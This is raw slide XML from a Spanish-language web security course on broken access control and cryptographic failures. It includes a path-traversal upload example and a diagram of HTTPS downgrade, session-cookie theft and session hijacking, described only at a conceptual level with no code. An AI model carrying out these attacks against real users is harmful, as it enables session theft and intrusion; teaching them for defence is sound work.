                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en la ruta: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>otra_carpeta</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nombre_fichero</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>En vez de en la carpeta prevista </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="Malo - Iconos gratis de negocios y finanzas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575ACA2E-E0B5-B123-B573-B4864F608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437" y="1452510"/>
            <a:ext cx="896938" cy="89693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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A752F913-EAC9-F1FD-DC8D-4E91AFF6AF62}"/>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660512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27429-4C4B-8656-345C-E5538D4A950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8D1C473-ED53-DF01-DECE-C58FCD4E056E}"/>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A9FD3D3-AE03-1787-241C-8B9D7150F9DD}"/>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01. Control de Acceso roto - Práctica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7ABF26-FDD6-5BE0-4BF2-69F1554BB20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8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760DB7AD-BFCF-018E-EBAB-F68BCCCF727B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600699" y="1806475"/>
            <a:ext cx="8990601" cy="3872357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Botón Rojo Play PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA50C648-3BB3-0AAD-3910-7F07AB0723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5855" y="959822"/>
            <a:ext cx="780288" cy="78028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B9D88E07-F4F6-093B-8888-8E76166B5C05}"/>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89226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1C452-1912-3D3E-AA18-9846301B21F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0082BE5-1FF6-5D21-E760-F531D3CD541B}"/>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7BCD2E7-8290-A676-0606-4A0861FAF3F0}"/>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02. Fallos criptográficos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC40BEF6-9D63-0BE7-B415-12F7E853872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9" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E409EC-D15A-7B0B-302A-F217200B8341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520471" y="4673336"/>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s-ES">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE5610F-273A-080D-67A3-9E9520DFE027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520471" y="1325418"/>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s-ES">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{920654F9-D72D-DCC8-C7B6-88ABCB949C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520471" y="2963321"/>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s-ES">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D48BE9B9-0B28-BE14-05C7-F42B698D893D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829403" y="1313861"/>
            <a:ext cx="5698691" cy="1200329"/>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rPr>
              <a:t>Los datos sensibles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pueden verse comprometidos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sin una protección como el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cifrado en reposo o en tránsito, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y requieren precauciones especiales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cuando se intercambian con el navegador</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24" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAF4A07-A94D-DDBF-45B0-BE6BF8B8F04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829403" y="3054105"/>
            <a:ext cx="5698689"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transmisión de datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en texto claro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, claves/algoritmos criptográficos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>débiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>falta de verificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> del certificado del servidor…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C9E8C-23C9-7E26-9834-2D42D890F9E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829403" y="4748914"/>
            <a:ext cx="569869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rPr>
              <a:t>Prevención mediante uso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>librerías criptográficas,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clasificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de los datos sensibles, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gestión de claves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adecuada…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Imagen 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{313C5F14-6E0A-8663-00FF-D0FF8E110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792" y="1589739"/>
            <a:ext cx="576258" cy="576258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Imagen 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE410AE-A59D-4E1A-2352-7CCB51B1A0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219" y="4937656"/>
            <a:ext cx="576258" cy="576258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Imagen 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8571C8C3-52FA-5F4E-2A00-1E75A1EEED45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="668404" y="3059919"/>
            <a:ext cx="707197" cy="725487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Imagen 28" descr="Teclado de computadora&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73705EDE-0664-D333-B916-AD6D4C8AADD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56442" y="1385998"/>
            <a:ext cx="3566960" cy="3950456"/>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C8367139-C117-CF35-8191-FD4151088671}"/>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414818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DD3B6-1ECD-BB4E-1FB6-7639E9C938A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E7B21FF-C0AD-F7EE-1F1D-BA4F90E90DB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F9E3D91-C885-B0F3-3472-F443AA77A7C0}"/>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02. Fallos criptográficos - Ejemplo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F97DBA-DEB1-EB50-2D2E-E3ACC2CFDE52}"/>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Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB92FCFC-524D-DF47-E0C7-29A8D8765461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2182602" y="853643"/>
            <a:ext cx="2057880" cy="2059130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80681D44-FE5F-6AB9-8878-3A6D5C60B51C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8010479" y="854191"/>
            <a:ext cx="1550933" cy="1536024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flecha: a la derecha 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7852314-A772-DD45-A096-7A61DFFE6D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5186344" y="1568346"/>
            <a:ext cx="1944773" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009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5" name="Flecha: hacia la izquierda 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458704EF-CB1A-4B40-E1F6-64E1F8DEE243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5186792" y="1030298"/>
            <a:ext cx="1944773" cy="500483"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009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7" name="Flecha: hacia abajo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376DC191-AF39-019F-575D-E0F266DED948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5916722" y="2895996"/>
            <a:ext cx="484632" cy="986332"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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8" name="CuadroTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{209557C6-C24D-F77F-E063-5D6C4D5FD331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824763" y="2847849"/>
            <a:ext cx="27077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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sitio web sin aplicar TLS o con cifrado débil</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A7DC59-4E15-C8CA-9C5B-D70344B3C560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8154872" y="2515312"/>
            <a:ext cx="1437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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Usuario</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E238E3-E271-ED1B-AC89-00C878346B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221372" y="2052136"/>
            <a:ext cx="19595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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Red inalámbrica insegura</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CuadroTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F8B5B9-24AC-6C5B-5FD9-60A5F0DC3F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7549335" y="3691065"/>
            <a:ext cx="297378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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Degrada las conexiones de HTTPS a HTTP, intercepta solicitudes y roba la cookie de sesión del usuario</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Conector recto de flecha 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA581872-C72E-4F28-5B0D-6C0A44B801F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4387324" y="3570517"/>
            <a:ext cx="810340" cy="1677355"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="004C41"/>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437DE977-238B-B0D7-F418-38AF7D0E5EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978065" y="4950276"/>
            <a:ext cx="30288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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Con esa cookie secuestra la sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D35458-DCA0-0944-9C02-F94E9EF83111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5591274" y="3996825"/>
            <a:ext cx="1118273" cy="1673478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
